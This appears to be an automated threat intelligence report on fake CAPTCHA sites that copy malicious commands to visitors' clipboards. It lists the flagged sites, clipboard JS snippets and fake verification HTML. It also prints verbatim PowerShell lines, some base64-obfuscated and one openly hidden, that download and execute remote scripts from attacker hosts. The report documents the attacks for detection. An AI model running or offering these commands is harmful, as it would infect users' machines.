Threat Intelligence Report

📅 May 22, 2025 🕒 Generated: 2025-05-22 02:42:59 🔍 Sites Analyzed: 28

🌐

Total Sites Analyzed

⚠️

Malicious Sites

64.0% detection rate

💻

PowerShell Commands

📋

Clipboard Hijacks

📊

Avg Threat Score

Attack Pattern Analysis

High Risk Commands

Base64 Encoded

Obfuscated JS

JS Redirects

Malicious Sites Detected

Click on a site to view detailed analysis

https://blessdayservices.org/up/

26 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

high risk commands

💻 PowerShell Commands 2

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";

powershell " + htaPath;

🔍 Suspicious Keywords 7

✅

I am not a robot

Verification Hash

reCAPTCHA Verification

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

https://mail.lucprofessional.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://test.peperoncinochepassione.it/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://lucprofessional.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.website.mypetapp.co.za/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.lucprofessional.grupomoltz.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://thesignaturemag.salviatech.com/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.bratusferramentas.grupomoltz.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://website.mypetapp.co.za/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://horno-rafelet.es/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://lucprofessional.grupomoltz.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.thesignaturemag.salviatech.com/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.test.peperoncinochepassione.it/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://my.salviatech.com/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

powershell

clipboard

downloads

captcha

base64

high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

http://101.32.40.22/

20 indicators detected

Score: 90 Clipboard Hijacking Fake CAPTCHA

clipboard

captcha

🔍 Suspicious Keywords 6

✅

I am not a robot

Verification ID

reCAPTCHA Verification

I'm not a robot

🌐 Extracted URLs 4

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

📋 Clipboard Manipulation Code

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

https://staplebrokenmetaliyro.blogspot.com/

55 indicators detected

Score: 90 Clipboard Hijacking Fake CAPTCHA

clipboard

captcha

🔍 Suspicious Keywords 7

\x3d

\x3c

\x22

\x3e

\x27

display:none

🌐 Extracted URLs 46

http://www.w3.org/1999/xhtml

http://www.google.com/2005/gml/b

http://www.google.com/2005/gml/data

http://www.google.com/2005/gml/expr

https://electricreport.org/ygd4g

📋 Clipboard Manipulation Code

...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...

captcha

base64

🔍 Suspicious Keywords 4

exec(

eval(

display:none

🌐 Extracted URLs 15

https://svetvip.ru/

https://api.whatsapp.com/send?phone=79258627909

https://svetvip.ru/catalog/vstraivaemye_svetilniki/

https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/

captcha

base64

🔍 Suspicious Keywords 2

<script src=

🌐 Extracted URLs 1

https://www.google.com

Technical Analysis

ClickGrab Threat Analysis Report - 2025-05-22

Most Common External Domains

www.google.com: 23 occurrences
use.fontawesome.com: 15 occurrences
staplebrokenmetaliyro.blogspot.com: 15 occurrences
cdnjs.cloudflare.com: 13 occurrences
www.blogger.com: 13 occurrences
www.webgo.de: 10 occurrences
t.me: 6 occurrences
www.w3.org: 6 occurrences
browser.certif-update.website: 4 occurrences
svetvip.ru: 4 occurrences

Common Pattern Analysis

reCAPTCHA imagery (15 occurrences, 1 distinct URLs)

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (15 times)

Font resources (28 occurrences, 2 distinct URLs)

https://use.fontawesome.com/releases/v5.0.0/css/all.css (15 times)
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (13 times)

CDN hosted scripts (14 occurrences, 2 distinct URLs)

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (13 times)
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources (25 occurrences, 9 distinct URLs)

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (15 times)
https://www.google.com/intl/en/policies/privacy/ (2 times)
https://www.google.com/intl/en/policies/terms/ (2 times)
https://www.google.com (1 times)
http://www.google.com/2005/gml/b (1 times)
...and 4 more distinct URLs

JavaScript Clipboard Analysis

Found clipboard manipulation code snippets in 30 places

document.execCommand copy

Found in 30 snippets (100.0% of clipboard code)

Examples:

document.execCommand("copy")

textarea manipulation

Found in 30 snippets (100.0% of clipboard code)

Fake CAPTCHA HTML Examples

Here's how the fake CAPTCHA verification appears in HTML:

Example 1:

<div class="recaptcha-box">

            <h2>Verify You Are Human</h2>

            <p>Please verify that you are a human to continue.</p>

<div class="container m-p">    

        <div id="checkbox-window" class="checkbox-window m-p block">

            <div class="checkbox-container m-p">

                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>

            </div>

Example 2:

<div class="recaptcha-box">

            <h2>Verify You Are Human</h2>

            <p>Please verify that you are a human to continue.</p>

<div class="container m-p">    

        <div id="checkbox-window" class="checkbox-window m-p block">

            <div class="checkbox-container m-p">

                <button type="button" id="checkbox" class="checkbox m-p line-normal"></button>

            </div>

Command Context Analysis

Found 16 PowerShell download context snippets

stageClipboard Function

Found 13 references to stageClipboard function

Example stageClipboard contexts:

Example 1:

...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Example 2:

...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Example 3:

...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...

Clipboard Attack Pattern Analysis

Insufficient data to reconstruct the complete clipboard attack pattern